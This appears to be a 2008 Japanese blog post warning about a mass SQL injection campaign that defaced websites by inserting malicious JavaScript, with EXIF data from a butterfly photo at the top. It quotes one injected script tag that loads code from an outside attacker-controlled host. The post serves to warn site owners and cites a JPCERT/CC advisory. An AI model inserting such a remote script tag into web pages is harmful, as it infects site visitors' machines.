アゲハチョウ(秦野市弘法山公園 神奈川県)
Date/Time: 2014:10:11 12:08:23
Camera: NIKON CORPORATION
Model: NIKON 1 V2
Exporsure Time: 1/500 [s]
FNumber: 5.6
Aperture Value: 5.0
Focal Length: 300.0 [mm]

y2blog » SQLインジェクションによるWEBページの改竄

4

28

2008

SQLインジェクションによるWEBページの改竄

SQLインジェクションによるWEBページの改竄が国内でも多数見つかっているようです


先週ぐらいからまた大規模なSQLインジェクションによって、WEBサイトに不正な Javascript を埋め込み、アクセスしてきたユーザのマシンを感染させる攻撃が蔓延しているようです.

埋め込まれる Javascript の一例として、 “<script src=http://www.nihaorr1.com/1.js>” があるようです.Google で検索を掛けただけでも50数万件がヒットしました.日本語のサイトも結構検索に引っ掛かりますので注意していないと危ないですね.

某国内大手ミュージックレーベルなどのアーティストのページなども検索に引っ掛かりました.この不正 Javascript が仕掛けられているページは、ASP によるものが殆どのようですが、そのうち WordPress などのブログサイトも攻撃対象になるかもしれません.Wordpress もこまめにアップデートするようにしましょう.
JPCERT/CC の情報 『SQL インジェクションによる Web サイト改ざんに関する注意喚起』

Calendar

September 2025
S M T W T F S
 123456
78910111213
14151617181920
21222324252627
282930  
  • Blogroll

  • Meta